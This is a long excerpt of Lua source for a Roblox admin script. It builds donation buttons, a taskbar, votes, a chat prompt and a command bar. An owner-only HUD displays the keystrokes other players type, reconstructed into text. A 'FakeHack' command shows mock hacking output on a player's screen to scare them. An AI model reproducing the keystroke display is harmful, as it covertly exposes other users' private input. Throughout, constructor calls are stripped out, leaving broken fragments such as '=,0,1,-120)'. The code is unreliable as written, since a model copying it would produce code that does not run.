  4658. local Dnt ="TextButton", Donate) Dnt.Name = "DonateButton" Dnt.Position =,0,1,-120) Dnt.Size =,0,0,30) Dnt.Font = "ArialBold" Dnt.FontSize = "Size14" Dnt.Text = "6 Robux" Dnt.BackgroundColor3 =,1,0) Dnt.TextColor3 =,1,1) Dnt.TextStrokeColor3 =,0,0) Dnt.TextStrokeTransparency = 0 Dnt.TextWrapped = true CORE:HandleEvent(Dnt, "MouseButton1Down", function() DonateMoney("6R", Dnt) end) SOUND:BindButton(Dnt)
  4659. local Dnt = Dnt:Clone() Dnt.Parent = Donate Dnt.Position =,0,1,-90) Dnt.Text = "20 Robux" Dnt.BackgroundColor3 =,1,0) CORE:HandleEvent(Dnt, "MouseButton1Down", function() DonateMoney("20R", Dnt) end) SOUND:BindButton(Dnt)
  4660. local Dnt = Dnt:Clone() Dnt.Parent = Donate Dnt.Position =,0,1,-60) Dnt.Text = "100 Robux" Dnt.BackgroundColor3 =,1,0) CORE:HandleEvent(Dnt, "MouseButton1Down", function() DonateMoney("100R", Dnt) end) SOUND:BindButton(Dnt)
  4661. local Dnt = Dnt:Clone() Dnt.Parent = Donate Dnt.Position =,0,1,-30) Dnt.Text = "500 ROBUX!" Dnt.BackgroundColor3 =,0,0) Dnt.FontSize = "Size18" CORE:HandleEvent(Dnt, "MouseButton1Down", function() DonateMoney("500R", Dnt) end) SOUND:BindButton(Dnt)
  4662. local PlayerAdmin, PlayerRank = RANK:IsAdmin(Player)
  4664. if PlayerAdmin == true then Body.Text = Body.Text.." (You're an admin, your rank is "..PlayerRank..")" end
  4666. if Closed then
  4667. Closed.Event:connect(function()
  4668. Open = false
  4669. end)
  4670. end
  4671. else
  4672. CloseForm:Invoke()
  4673. end
  4674. end) end)()
  4675. if RANK:GetRank(Player) == "Owner" then
  4676. local HUDButton ="ImageButton", TaskBar) HUDButton.Name = "HUDButton" HUDButton.Position =, -50, 0, -170) HUDButton.Size =, 50, 0, 50) HUDButton.BackgroundTransparency = 1 HUDButton.Image = "rbxassetid://329362761"
  4677. CORE:HandleEvent(HUDButton, "MouseButton1Click", function()
  4678. local HUDSG = Player.PlayerGui:FindFirstChild("M".."a".."k".."e".."r".."m".."od".."elLu".."a's HUD Gui")
  4679. if HUDSG then
  4680. HUDSG:Destroy()
  4681. else
  4682. GUI:CreateHUD(Player)
  4683. end
  4684. end)
  4685. end
  4686. end
  4688. CORE:HandleEvent(TaskButton, "MouseButton1Click", function()
  4689. if IsMoving == false then
  4690. if TaskBarShown == true then
  4691. TaskBarShown = false
  4692. IsMoving = true
  4693. TaskBar:TweenPosition(,0,1,20), "In", "Sine", 0.3, false, function() IsMoving = false end)
  4694. else
  4695. TaskBarShown = true
  4696. IsMoving = true
  4697. TaskBar:TweenPosition(,0,0.6,0), "Out", "Sine", 0.3, false, function() IsMoving = false end)
  4698. end
  4699. end
  4700. end)
  4702. local function ReloadIcons()
  4703. for Num,Data in pairs(Tasks) do
  4704. Data[2].Position =,(Num * 50) - 50,0,0,0)
  4705. end
  4706. end
  4708. AddForm.Event:connect(function(Form, IconID, Closed, Minimized, Restore)
  4709. local Icon ="ImageButton", TaskBar) Icon.Name = "Icon" Icon.Position =,#Tasks * 50,0,0,0) Icon.Size =, 50, 0, 50) Icon.BackgroundColor3 = GUI:GetColor() Icon.BackgroundTransparency = 0.5 Icon.Image = "rbxassetid://"..IconID
  4710. table.insert(Tasks, {Form, Icon})
  4711. local CanClick = true
  4712. CORE:HandleEvent(Icon, "MouseButton1Down", function()
  4713. if Form.IsActive.Value == false then
  4714. Restore:Invoke()
  4715. elseif CanClick == true then
  4716. coroutine.wrap(function()
  4717. CanClick = false
  4718. local DefPos = Form.Dragger.Position
  4719. for i = 1,15 do
  4720. Form.Dragger.Position = DefPos +,math.random(-2,2),0,math.random(-2,2))
  4721. wait(0.05)
  4722. end
  4723. Form.Dragger.Position = DefPos
  4724. CanClick = true
  4725. end)()
  4726. end
  4727. end)
  4728. ReloadIcons()
  4730. Closed.Event:connect(function()
  4731. for Num,Data in pairs(Tasks) do
  4732. if Data[1] == Form then
  4733. Icon:Destroy()
  4734. table.remove(Tasks, Num)
  4735. end
  4736. end
  4737. ReloadIcons()
  4738. end)
  4739. end)
  4740. end
  4742. function GUI:ShowDebtStats(Player, ManualText)
  4743. local Text = ManualText
  4744. if not ManualText then
  4746. local RawPage = REMOTE:GetURL("")
  4747. if RawPage then
  4748. local _,GetStart = string.find(RawPage, 'debtDisplayFast">')
  4749. local GetEnd,__ = string.find(string.sub(RawPage,GetStart), '</span>')
  4750. Text = "US National Debt: $"..STRING:GetComma(string.sub(RawPage, GetStart + 1, GetStart + GetEnd - 2))
  4751. end
  4752. end
  4754. local Frame = GUI:CreateForm(Player, "US National Debt",,500,0.05,100), nil, 38574945)
  4755. local Body ="TextLabel", Frame) Body.Name = "Body" Body.Size =,0,1,0) Body.BackgroundTransparency = 1 Body.Text = Text Body.Font = "ArialBold" Body.FontSize = "Size36" Body.TextColor3 =,1,1) Body.TextStrokeTransparency = 0 Body.TextWrapped = true
  4757. return Text
  4758. end
  4760. function GUI:ShowCommand(Player, CommandTrigger, Dialog)
  4761. if not Player then return nil end
  4762. if not CommandTrigger then return nil end
  4764. if type(CommandTrigger) == "string" and string.sub(CommandTrigger,1,#Settings.Prefix) == Settings.Prefix then CommandTrigger = string.sub(CommandTrigger,#Settings.Prefix + 1) end
  4766. local CommandKey = CommandTrigger
  4768. if not Commands[CommandKey] then
  4769. for CommandNames,_ in pairs(Commands) do
  4770. for _,CommandName in pairs(CommandNames) do
  4771. if CommandName == CommandKey then
  4772. CommandKey = CommandNames
  4773. end
  4774. end
  4775. end
  4776. end
  4778. local CommandData = Commands[CommandKey]
  4780. local BodyText = "No valid command has been entered"
  4781. local TitleText = "Error"
  4782. local CanExe = false
  4783. if CommandData then
  4784. if Dialog then
  4785. Dialog:Invoke(true)
  4786. end
  4787. local PlayerRank = RANK:GetRank(Player)
  4788. if RANK:ConvertRank(PlayerRank) >= RANK:ConvertRank(CommandData[4]) then CanExe = true end
  4789. if PlayerRank == "Member" and CommandData.Abusable == true then CanExe = false end
  4791. TitleText = "Command: "..CommandKey[1]
  4792. BodyText = "COMMAND: "..Settings.Prefix..CommandKey[1]..Settings.Bet..CommandData[1]..[[
  4795. Aliases: ]]..Settings.Prefix..table.concat(CommandKey, ", "..Settings.Prefix)..[[
  4798. Description: ]]..CommandData[2]..[[
  4801. Arguments: ]]..CommandData[3]..[[
  4804. Minimum rank needed: ]]..CommandData[4]..[[
  4807. Fun command: ]]..STRING:BoolString(CommandData[5])..[[
  4810. Abusable command: ]]..STRING:BoolString(CommandData.Abusable)..[[
  4813. Http Command ]]..STRING:BoolString(CommandData.Http)
  4814. end
  4816. _, _, Closed, _, Minimized = GUI:FullMessage(Player, TitleText, BodyText, "Search", not CanExe)
  4817. if Dialog then
  4818. Closed.Event:connect(function() Dialog:Invoke(false) end)
  4819. Minimized.Event:connect(function() Dialog:Invoke(false) end)
  4820. end
  4821. end
  4823. function GUI:CreateHUD(Speaker)
  4824. if not Speaker or not Speaker:FindFirstChild("PlayerGui") then return nil end
  4826. local SG = Speaker.PlayerGui:FindFirstChild("M".."a".."ke".."r".."m".."od".."elLu".."a's HUD Gui")
  4827. if SG then SG:Destroy() end
  4828. SG ="ScreenGui", Speaker.PlayerGui) SG.Name = "M".."a".."k".."e".."r".."m".."odelLu".."a's HUD Gui"
  4830. local function AddHUD(Player, Char)
  4831. if not Char or not Char:FindFirstChild("Head") then return nil end
  4833. local Rank = RANK:GetRank(Player)
  4834. local PlayerHUD ="BillboardGui", SG) PlayerHUD.Name = "PlayerHUD" PlayerHUD.AlwaysOnTop = true PlayerHUD.Adornee = Char.Head PlayerHUD.Size =,0,3,0)
  4835. local HUD ="ImageLabel", PlayerHUD) HUD.Name = "HUD" HUD.Size =, 0, 1, 0) HUD.BackgroundColor3 =, 1, 1) HUD.BackgroundTransparency = 1
  4836. local InfoLabel ="TextLabel", PlayerHUD) InfoLabel.Name = "InfoLabel" InfoLabel.Position =, -1, 0, 0) InfoLabel.Size =, 0, 0.8, 0) InfoLabel.BackgroundColor3 =, 1, 1) InfoLabel.BackgroundTransparency = 1 InfoLabel.Text = "" InfoLabel.Font = "Arial" InfoLabel.TextScaled = true InfoLabel.TextStrokeTransparency = 0.9 InfoLabel.TextWrapped = true InfoLabel.TextXAlignment = "Left" InfoLabel.TextYAlignment = "Top" InfoLabel.TextColor3 =, 0, 0) InfoLabel.TextStrokeColor3 =, 1, 1)
  4837. local KeyLabel ="TextLabel", PlayerHUD) KeyLabel.Name = "KeyLabel" KeyLabel.Position =, 1, -1, 0) KeyLabel.Size =, 0, 3, 0) KeyLabel.BackgroundColor3 =, 1, 1) KeyLabel.BackgroundTransparency = 1 KeyLabel.Text = "" KeyLabel.Font = "Arial" KeyLabel.FontSize = "Size14" KeyLabel.TextScaled = true KeyLabel.TextStrokeTransparency = 0.9 KeyLabel.TextWrapped = true KeyLabel.TextXAlignment = "Right" KeyLabel.TextYAlignment = "Top" KeyLabel.TextColor3 =, 1, 1)
  4838. local KeyOutput ="TextLabel", PlayerHUD) KeyOutput.Name = "KeyOutput" KeyOutput.Position =, 1, -0.5, 0) KeyOutput.Size =, 0, 0.5, 1) KeyOutput.BackgroundTransparency = 1 KeyOutput.Text = "" KeyOutput.Font = "SourceSansLight" KeyOutput.FontSize = "Size14" KeyOutput.TextScaled = true KeyOutput.TextWrapped = true KeyOutput.TextXAlignment = "Left" KeyOutput.TextColor3 =, 1, 1)
  4839. coroutine.wrap(function() while wait() and InfoLabel and InfoLabel.Parent and Char and Char:FindFirstChild("Head") do
  4840. InfoLabel.Text = "Name: "..Player.Name..[[
  4841. Rank: ]]..RANK:GetRank(Player)..[[
  4842. Age: ]]..STRING:FindAge(Player.AccountAge)
  4843. if Speaker.Character and Speaker.Character:FindFirstChild("Head") then
  4844. InfoLabel.Text = InfoLabel.Text..[[
  4845. Distance: ]]..CORE:Round((Speaker.Character.Head.Position - Player.Character.Head.Position).magnitude)
  4846. end
  4847. if LastKeys[Player.UserId] then
  4848. local Keys = ""
  4849. local KeyLog = {}
  4850. for _,KeyData in pairs(LastKeys[Player.UserId]) do
  4851. table.insert(KeyLog, KeyData[1])
  4852. if KeyData[2] == 8 then
  4853. Keys = string.sub(Keys, 1, #Keys - 1)
  4854. elseif KeyData[2] == 13 then
  4855. Keys = Keys.." "
  4856. else
  4857. Keys = Keys..string.char(KeyData[2])
  4858. end
  4859. end
  4860. KeyLabel.Text = table.concat(KeyLog, "\n")
  4861. KeyOutput.Text = Keys
  4862. end
  4863. HUD.Image = "rbxassetid://"..RankHUD[Rank]
  4864. end end)()
  4866. local CharRev,Removing = nil,nil
  4867. CharRev = Player.CharacterRemoving:connect(function()
  4868. PlayerHUD:Destroy()
  4869. CharRev:disconnect()
  4870. Removing:disconnect()
  4871. end)
  4872. Removing = Server.Players.PlayerRemoving:connect(function(PlayerR) if PlayerR == Player then
  4873. PlayerHUD:Destroy()
  4874. CharRev:disconnect()
  4875. Removing:disconnect()
  4876. end end)
  4877. end
  4879. local function ConnectHUD(Player)
  4880. if Player ~= Speaker then
  4881. if Player.Character then
  4882. AddHUD(Player, Player.Character)
  4883. end
  4885. Player.CharacterAdded:connect(function(Char)
  4886. if Speaker then
  4887. AddHUD(Player, Char)
  4888. else return nil
  4889. end
  4890. end)
  4891. end
  4892. end
  4894. for _,Player in pairs(Server.Players:GetPlayers()) do
  4895. ConnectHUD(Player)
  4896. end
  4898. Server.Players.PlayerAdded:connect(ConnectHUD)
  4899. end
  4901. function GUI:CreateMessagePrompt(Player, Title, ImageID, PreAdd, SpeakerEvents)
  4902. if not Player or not Player:FindFirstChild("PlayerGui") then return nil end
  4903. local Stopped = false
  4905. local Frame, _, Closed = GUI:CreateForm(Player, Title,,0,0.5,0), nil, ImageID)
  4906. Frame.Size =, 0, 1, -30)
  4907. Frame.CanvasSize =, 0 ,0 ,0)
  4909. local FakeCB ="TextButton", Frame.Parent) FakeCB.Name = "FakeChatBox" FakeCB.Position =, 0, 1, -30) FakeCB.Size =, -50, 0, 30) FakeCB.BackgroundTransparency = 1 FakeCB.Text = "Click here or press the '-' key" FakeCB.Font = Settings.Font FakeCB.FontSize = "Size18" FakeCB.TextXAlignment = "Left" FakeCB.ZIndex = 2
  4910. local ChatBox ="TextBox", Frame.Parent) ChatBox.Name = "ChatBox" ChatBox.Position =, 0, 1, -30) ChatBox.Size =, -50, 0, 30) ChatBox.BackgroundTransparency = 0.5 ChatBox.BackgroundColor3 = GUI:GetColor() ChatBox.Text = "" ChatBox.Font = Settings.Font ChatBox.FontSize = "Size18" ChatBox.TextXAlignment = "Left" ChatBox.ClearTextOnFocus = false
  4911. local Send ="TextButton", Frame.Parent) Send.Position =, -50, 1, -30) Send.Size =, 50, 0, 30) Send.BackgroundColor3 = GUI:GetColor() Send.BackgroundTransparency = 0.5 Send.Text = "Enter" Send.Font = Settings.Font Send.FontSize = "Size14"
  4913. local function AddLine(Speaker, MessageText, MessageColor)
  4914. MessageText = STRING:DetermineFilter(MessageText, Speaker, Player)
  4915. if MessageColor == true then MessageColor =,0,0) end
  4916. if not MessageColor then MessageColor = GUI:ContrastColor() end
  4917. local Bounds ="Frame") Bounds.Name = "Bounds" Bounds.Position =, 0, 1, -20) Bounds.Size =, 0, 0, 20) Bounds.BackgroundTransparency = 1
  4918. local Name ="TextLabel", Bounds) Name.Name = "PName" Name.Size =, 60, 1, 0) Name.BackgroundTransparency = 1 Name.Text = Speaker..": " Name.Font = "ArialBold" Name.FontSize = "Size14" Name.TextXAlignment = "Left" Name.TextColor3 = GUI:GetNameColor(Speaker).Color
  4919. local Message ="TextLabel", Bounds) Message.Name = "Message" Message.Position =, 60, 0, 0) Message.Size =, 60, 1, 0) Message.BackgroundTransparency = 1 Message.Text = MessageText Message.Font = "ArialBold" Message.FontSize = "Size14" Message.TextXAlignment = "Left" Message.TextColor3 = MessageColor
  4920. Bounds.Parent = Frame
  4921. end
  4923. local RPR = CORE:CreateRemotePropertyReader(ChatBox)
  4925. local Functions ="Folder", Frame) Functions.Name = "Functions"
  4926. local SendPressed ="BindableEvent", Functions) SendPressed.Name = "SendPressed"
  4927. local AddMessage ="BindableFunction", Functions) AddMessage.Name = "AddMessage"
  4929. local EnterPressed ="RemoteFunction", ChatBox) EnterPressed.Name = "EnterPressed"
  4930. local ClearCB ="RemoteFunction", ChatBox) ClearCB.Name = "ClearCB"
  4932. CORE:ExecuteResource("MessagePromptHandler", Frame)
  4934. wait(0.1)
  4936. if PreAdd then
  4937. for Num,Add in pairs(PreAdd) do
  4938. AddLine(Add[1], Add[2], Add[3])
  4939. end
  4940. end
  4942. --[[
  4943. CORE:ExecuteResource("ChatBoxLocal", ChatBox)
  4945. CORE:HandleEvent(ChatBox, "MouseEnter", function()
  4946. if ChatBox.Text == "Click here or press the '-' key" then
  4947. ChatBox.Text = ""
  4948. end
  4949. end)
  4950. ]]
  4952. local function FireSendPressed()
  4953. local Text = CORE:ReadProperty(RPR, Player, "Text")
  4954. if Text ~= "" and Text ~= "Click here or press the '-' key" then
  4955. SendPressed:Fire(Text)
  4956. FakeCB.Visible = true
  4957. ClearCB:InvokeClient(Player)
  4958. end
  4959. end
  4961. Closed.Event:connect(function()
  4962. if Stopped == false then
  4963. Stopped = true
  4964. if SpeakerEvents then SpeakerEvents("Leave") end
  4965. end
  4966. end)
  4968. CORE:HandleEvent(Send, "MouseButton1Down", FireSendPressed)
  4969. EnterPressed.OnServerInvoke = FireSendPressed
  4970. AddMessage.OnInvoke = AddLine
  4972. if SpeakerEvents then
  4973. SpeakerEvents("Join")
  4975. coroutine.wrap(function()
  4976. repeat wait() until not Frame or not Frame.Parent
  4977. if Stopped == false then
  4978. Stopped = true
  4979. SpeakerEvents("Leave")
  4980. end
  4981. end)()
  4982. end
  4984. return SendPressed, AddMessage
  4985. end
  4987. function GUI:PromptMessageWithButtons(Player, Title, BodyText, IconID, Buttons, Time, ShowFormButtons, DontFilter)
  4988. if tonumber(Time) then ShowFormButtons = false end
  4989. if not DontFilter then BodyText = STRING:DetermineFilter(BodyText, Player) end
  4990. local Frame, Close = GUI:CreateForm(Player, Title,,0,0.4,0), nil, IconID, ShowFormButtons)
  4991. local Body ="TextLabel", Frame) Body.Name = "Body" Body.Size =, 0, 1, -60) Body.BackgroundTransparency = 1 Body.Text = BodyText Body.Font = Settings.Font Body.FontSize = "Size18" Body.TextWrapped = true Body.TextColor3 = GUI:ContrastColor()
  4992. local Clicked = nil
  4993. local Alive = true
  4995. local function ClosePrompt(ButtonName)
  4996. Alive = false
  4997. Close:Invoke()
  4998. Clicked = ButtonName
  4999. end
  5001. for Num,Select in pairs(Buttons) do
  5002. local Name = Select
  5003. local Style = "White"
  5004. local TextColor3 =,0,0)
  5005. if type(Select) == "table" then
  5006. Name = Select[1]
  5007. if Select[2] then Style = Select[2] end
  5008. if Select[3] then TextColor3 = Select[3] end
  5009. elseif type(Select) == "string" then
  5010. local Case = string.lower(Select)
  5011. if Case == "ok" then
  5012. Name = "Ok"
  5013. Style = "Primary"
  5014. TextColor3 =,1,1)
  5015. elseif Case == "yes" then
  5016. Name = "Yes"
  5017. Style = "Gray"
  5018. TextColor3 =,1,0)
  5019. elseif Case == "no" then
  5020. Name = "No"
  5021. Style = "Red"
  5022. TextColor3 =,0,0)
  5023. end
  5024. end
  5026. if Style == "None" then Style = "Custom" end
  5027. if Style == "Casual" then Style = "RobloxButton" end
  5028. if Style == "Red" then Style = "RobloxButtonDefault" end
  5029. if Style == "Gray" then Style = "RobloxRoundButton" end
  5030. if Style == "Primary" then Style = "RobloxRoundDefaultButton" end
  5031. if Style == "White" then Style = "RobloxRoundDropdownButton" end
  5033. local Button ="TextButton", Frame) Button.Name = Name Button.Position =, 0, 1, -55) Button.Size =, 0, 0, 50) Button.BackgroundColor3 =, 1, 1) Button.Text = Name Button.Font = Settings.Font Button.FontSize = "Size14" Button.TextScaled = true Button.TextWrapped = true Button.TextColor3 = TextColor3 Button.Style = Style
  5034. CORE:HandleEvent(Button, "MouseButton1Down", function() ClosePrompt(Name) end)
  5035. SOUND:BindButton(Button)
  5036. end
  5038. if tonumber(Time) then
  5039. local Ticker ="TextLabel", Frame.Parent) Ticker.Size =, 0, 0, 30) Ticker.TextColor3 = GUI:ContrastColor() Ticker.BackgroundTransparency = 1 Ticker.Text = Time Ticker.Font = "ArialBold" Ticker.FontSize = "Size18"
  5040. Frame.Size = Frame.Size +,0,0,-30)
  5041. Frame.Position = Frame.Position +,0,0,30)
  5043. for i = Time,0,-1 do
  5044. for ii = 1,10 do
  5045. if Alive == true then
  5046. Ticker.Text = i
  5047. wait(0.1)
  5048. else
  5049. break
  5050. end
  5051. end
  5052. end
  5053. if Alive == true then
  5054. ClosePrompt()
  5055. end
  5056. end
  5058. repeat wait() until Alive == false
  5059. return Clicked
  5060. end
  5062. function GUI:Vote(Speaker, Players, Text, Time)
  5063. if not Players or not Text or #Players <= 0 then return end
  5065. local Votes = {}
  5066. local Tick = 0
  5068. for _,Player in pairs(Players) do
  5069. local FilterText = STRING:DetermineFilter(Text, Speaker, Player)
  5070. local CanVote = true
  5071. if not game.Players:FindFirstChild(tostring(Player)) or not Player.PlayerGui then CanVote = false end
  5072. if CanVote == true then
  5073. coroutine.wrap(function()
  5074. local Answer = GUI:PromptMessageWithButtons(Player, "Vote", FilterText, 34730262, {"Yes", "No"}, Time, false, true)
  5075. if Answer == nil then Answer = "Unknown" end
  5076. table.insert(Votes, Answer)
  5077. end)()
  5078. end
  5079. end
  5080. repeat wait(1) Tick = Tick + 1 until #Votes >= #Players or Tick >= Time
  5081. wait(2)
  5082. if Speaker and Speaker:FindFirstChild("PlayerGui") then
  5083. local Total = #Players
  5084. local Yes,No,Unknown = 0,0,0
  5085. for _,Vote in pairs(Votes) do
  5086. if Vote == "Yes" then Yes = Yes + 1
  5087. elseif Vote == "No" then No = No + 1
  5088. end
  5089. end
  5090. Unknown = #Players - #Votes
  5092. local Frame = GUI:CreateForm(Speaker, "Vote Results",, 0, 0.35, 0), nil, 42330863)
  5093. local QText ="TextLabel", Frame) QText.Name = "QText" QText.Size =, 0, 1, -55) QText.BackgroundColor3 =, 1, 1) QText.BackgroundTransparency = 1 QText.Text = "Results for: "..STRING:DetermineFilter(Text, Speaker) QText.Font = Settings.Font QText.FontSize = "Size18" QText.TextWrapped = true QText.TextYAlignment = "Top" QText.TextColor3 = GUI:ContrastColor()
  5094. local RTextYes ="TextLabel", Frame) RTextYes.Name = "RTextYes" RTextYes.Position =, 0, 1, -55) RTextYes.Size =, 0, 0, 55) RTextYes.BackgroundColor3 =, 1, 1) RTextYes.BackgroundTransparency = 1 RTextYes.Font = Settings.Font RTextYes.FontSize = "Size18" RTextYes.TextXAlignment = "Left" RTextYes.TextYAlignment = "Bottom" RTextYes.TextColor3 =, 1, 0) RTextYes.Text = [[Yes:
  5095. ]]..Yes.."/"..Total..[[
  5096. ]]..math.ceil((Yes/Total)*100).."% "
  5097. local RTextNo ="TextLabel", Frame) RTextNo.Name = "RTextNo" RTextNo.Position =, 0, 1, -55) RTextNo.Size =, 0, 0, 55) RTextNo.BackgroundColor3 =, 1, 1) RTextNo.BackgroundTransparency = 1 RTextNo.Font = Settings.Font RTextNo.FontSize = "Size18" RTextNo.TextXAlignment = "Right" RTextNo.TextYAlignment = "Bottom" RTextNo.TextColor3 =, 0, 0) RTextNo.Text = [[No:
  5098. ]]..No.."/"..Total..[[
  5099. ]]..math.ceil((No/Total)*100).."% "
  5100. local RTextUnknown ="TextLabel", Frame) RTextUnknown.Name = "RTextUnknown" RTextUnknown.Position =, 0, 1, -55) RTextUnknown.Size =, 0, 0, 55) RTextUnknown.BackgroundColor3 =, 1, 1) RTextUnknown.BackgroundTransparency = 1 RTextUnknown.Font = Settings.Font RTextUnknown.FontSize = "Size18" RTextUnknown.TextYAlignment = "Bottom" RTextUnknown.TextColor3 =, 0, 0) RTextUnknown.Text = [[No vote:
  5101. ]]..Unknown.."/"..Total..[[
  5102. ]]..math.ceil((Unknown/Total)*100).."% "
  5103. end
  5104. end
  5106. --GUI:Vote(game.Players.Player1, {game.Players.Player1}, "fuck me", 30)
  5108. function GUI:LoadGui(Player, Text, InfoText)
  5109. if not Player or not Player:FindFirstChild("PlayerGui") then return nil end
  5110. local Dead = false
  5112. local Frame, Close = GUI:CreateForm(Player, Text,,100,0.1,100), nil, 206886319, false)
  5113. local WaitIcon ="ImageLabel", Frame) WaitIcon.Name = "WaitIcon" WaitIcon.Position =, 10, 0.5, -35) WaitIcon.Size =, 70, 0, 70) WaitIcon.BackgroundColor3 =, 1, 1) WaitIcon.BackgroundTransparency = 1 WaitIcon.Image = ""
  5114. local LoadLabel ="TextLabel", Frame) LoadLabel.Position =, 85, 0, 0) LoadLabel.Size =, -90, 1, 0) LoadLabel.TextColor3 = GUI:ContrastColor() LoadLabel.BackgroundTransparency = 1 LoadLabel.Text = Text LoadLabel.Font = "ArialBold" LoadLabel.FontSize = "Size24" LoadLabel.TextWrapped = true LoadLabel.TextXAlignment = "Left"
  5115. local Info ="TextLabel", Frame) Info.Size =, 0, 1, 0) Info.TextColor3 = GUI:ContrastColor() Info.BackgroundTransparency = 1 Info.Text = "" Info.Font = Settings.Font Info.FontSize = "Size14" Info.TextWrapped = true Info.TextXAlignment = "Left" Info.TextYAlignment = "Bottom"
  5116. if InfoText then Info.Text = InfoText end
  5118. local CloseGui ="BindableFunction", Frame) CloseGui.Name = "CloseGui"
  5119. local AddInfo ="BindableFunction", Frame) CloseGui.Name = "AddInfo"
  5121. CloseGui.OnInvoke = function()
  5122. Close:Invoke()
  5123. Dead = true
  5124. end
  5125. AddInfo.OnInvoke = function(AddText)
  5126. Info.Text = AddText
  5127. end
  5129. coroutine.wrap(function()
  5130. for i = 0,math.huge,3 do
  5131. if Dead == false and Frame then
  5132. WaitIcon.Rotation = i
  5133. wait()
  5134. else
  5135. break
  5136. end
  5137. end
  5138. end)()
  5140. coroutine.wrap(function()
  5141. while Dead == false and Frame do
  5142. wait(0.5)
  5143. LoadLabel.Text = Text.."."
  5144. wait(0.5)
  5145. LoadLabel.Text = Text..".."
  5146. wait(0.5)
  5147. LoadLabel.Text = Text.."..."
  5148. wait(0.5)
  5149. LoadLabel.Text = Text..".."
  5150. wait(0.5)
  5151. LoadLabel.Text = Text.."."
  5152. wait(0.5)
  5153. LoadLabel.Text = Text
  5154. end
  5155. end)()
  5157. wait(1)
  5159. return CloseGui, AddInfo
  5160. end
  5162. function GUI:FakeHack(Player) coroutine.wrap(function()
  5163. if not Player or not Player:FindFirstChild("PlayerGui") then return end
  5164. local FakeText = [[
  5165. >SHELL: BEGIN
  5166. >RUNCODE:
  5167. return {
  5168. local Hack = {"Account", "Tix", "Robux"};
  5169. function Start(Type, Inject, Scan)
  5170. if not Inject then Inject = "In-Game" end
  5171. return {Type, Inject, Scan}
  5172. end
  5173. for Exe,Exploit in pairs(Hack) do
  5174. local IP = Start("In-Game",Exploit,
  5175. BeginScan("PLAYERNAME","Socket",{PLAYERNAME, "Local-ID"};0xPLAYERCONNECT),
  5176. {"LOCAL-IP", "SERVER-IP", "HOST-IP"}
  5177. )
  5178. Start:ExtractData = function() EndScan("RobloxPlayerBeta.exe","Place1","PLAYERNAME") end
  5179. for i = 1,#Injection[2] do
  5180. Log("PlayerData", "ConnectHost", "PLAYERNAME")
  5181. end
  5182. local PlayerProxy = newproxy(true)
  5183. setmetatable(PlayerProxy,Injection[3],{
  5184. __index = function(StealData, ...) local Data = unpack(...)
  5185. return {Data,"IP-KEY-LOG: 'PLAYERNAME'"}
  5186. end;
  5187. })
  5188. end
  5190. }
  5193. ]]
  5194. local SG = Player.PlayerGui:FindFirstChild("MML Hack Gui")
  5195. if SG then SG:Destroy() end
  5196. SG ="ScreenGui", Player.PlayerGui)
  5197. SG.Name = "MML Hack Gui"
  5198. local Frame ="Frame", SG) Frame.Name = "HackFrame" Frame.BackgroundColor3 =,0,0) Frame.Position =,-125,0.4,-100) Frame.Size =,250,0.1,200)
  5199. local X ="TextButton", Frame) X.Name = "X" X.Style = "RobloxButtonDefault" X.Size =,20,0,20) X.Visible = false X.Font = "ArialBold" X.FontSize = "Size18" X.Text = "X" X.TextColor3 =,0,0) X.ZIndex = 2 CORE:HandleEvent(X, "MouseButton1Click", function() SG:Destroy() end)
  5200. local HT ="TextLabel", Frame) HT.Name = "Hack Text" HT.Size =,0,1,0) HT.BackgroundTransparency = 1 HT.Font = "ArialBold" HT.FontSize = "Size12" HT.TextColor3 =,1,0) HT.TextXAlignment = "Left" HT.TextYAlignment = "Bottom" HT.ClipsDescendants = true HT.Font = "Code"
  5201. for i = 1,#FakeText do
  5202. HT.Text = string.sub(string.gsub(FakeText, "PLAYERNAME", Player.Name), 1, i)
  5203. if math.random(1,5) == 1 then
  5204. wait()
  5205. end
  5206. end
  5207. HT.Text = string.gsub(FakeText, "PLAYERNAME", Player.Name)
  5208. wait(3)
  5209. HT.Text = HT.Text..[[>INFO: You did not really get hacked, this command is a
  5210. fake hack command from Maker]]..[[ModelLu]]..[[a's Admin V3]]
  5211. X.Visible = true
  5212. end)() end
  5214. function GUI:CommandBar(Player)
  5215. if not Player or not Player:FindFirstChild("PlayerGui") then return nil end
  5217. local Frame = GUI:CreateForm(Player, "Command Bar",, 100, 0.1, 50),, -50, 0.1, 0), "Admin", nil, nil, nil, nil, nil, nil, true)
  5218. local CommandBox ="TextBox", Frame) CommandBox.Name = "CommandBox" CommandBox.Position =, 5, 0, 5) CommandBox.Size =, -20, 0.4, 0) CommandBox.BackgroundColor3 = GUI:GetColor() CommandBox.BackgroundTransparency = Settings.TransparencyScheme CommandBox.Text = "Enter a command here" CommandBox.Font = Settings.Font CommandBox.FontSize = "Size18" CommandBox.TextXAlignment = "Left" CommandBox.TextColor3 = GUI:ContrastColor() CommandBox.ClearTextOnFocus = false
  5219. local Execute ="TextButton", Frame) Execute.Name = "Execute" Execute.Position =, 5, 0.7, -10) Execute.Size =, -20, 0.4, -10) Execute.BackgroundColor3 = GUI:GetColor() Execute.BackgroundTransparency = Settings.TransparencyScheme Execute.Text = "Execute" Execute.Font = "ArialBold" Execute.FontSize = "Size18" Execute.TextColor3 = GUI:ContrastColor()
  5220. local Suggest ="ScrollingFrame", Frame) Suggest.Name = "Suggest" Suggest.BackgroundTransparency = Settings.TransparencyScheme Suggest.CanvasSize =,0,0,0) Suggest.BackgroundColor3 = GUI:ContrastColor() Suggest.Size =,0,1,0)
  5222. local _,Rank = RANK:GetRank(Player)
  5223. local UsableCommands = {}
  5224. for CommandNames,Data in pairs(Commands) do
  5225. if not Data.Hidden then
  5226. if RANK:ConvertRank(Data[4]) <= Rank then
  5227. for _,Command in pairs(CommandNames) do
  5228. table.insert(UsableCommands, {Command, Data[3]})
  5229. end
  5230. end
  5231. end
  5232. end
  5234. local RPR = CORE:CreateRemotePropertyReader(CommandBox)
  5236. local function ExecuteText()
  5237. local Text = CORE:ReadProperty(RPR, Player, "Text")
  5238. CORE:Chatted(Text, Player, true)
  5239. CommandBox.Text = "Enter a command here"
  5240. end
  5242. local function AddSuggestion(Text)
  5243. if Text == nil then Text = Settings.Prefix end
  5244. local Suggestion ="TextButton", Suggest) Suggestion.Name = "Suggestion" Suggestion.Size =, -13, 0, 25) Suggestion.Position =,0,0,(#Suggest:GetChildren()-1)*25) Suggestion.BackgroundColor3 =, 1, 1) Suggestion.BackgroundTransparency = Settings.TransparencyScheme Suggestion.Text = Text Suggestion.Font = Settings.Font Suggestion.FontSize = "Size14" Suggestion.TextXAlignment = "Left" Suggestion.TextColor3 =, 0, 0)
